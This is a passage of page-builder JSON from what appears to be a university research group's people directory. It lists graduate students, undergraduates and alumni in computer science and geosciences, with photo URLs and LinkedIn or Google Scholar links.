Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c91\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassani\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c140\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c142\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c140\",\"index\":2,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c140\",\"index\":3,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c140\",\"index\":1,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c242\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c242\",\"index\":0,\"id\":\"182-c243\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Siv-photo.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1860,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c242\",\"index\":0,\"id\":\"182-c244\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sivgech Heang<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c242\",\"index\":2,\"id\":\"182-c245\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c242\",\"index\":3,\"id\":\"182-c246\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sivgech-heang-91842618a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c242\",\"index\":1,\"id\":\"182-c247\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c74\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c73\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c148\",\"parentId\":\"182-c147\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c147\",\"parentId\":\"182-c146\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c146\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c156\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c156\",\"index\":0,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c156\",\"index\":0,\"id\":\"182-c158\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c156\",\"index\":2,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c156\",\"index\":1,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c150\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c149\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c163\",\"parentId\":\"182-c162\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c162\",\"parentId\":\"182-c161\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c161\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c166\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c166\",\"index\":2,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c166\",\"index\":1,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c171\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c171\",\"index\":2,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c171\",\"index\":1,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 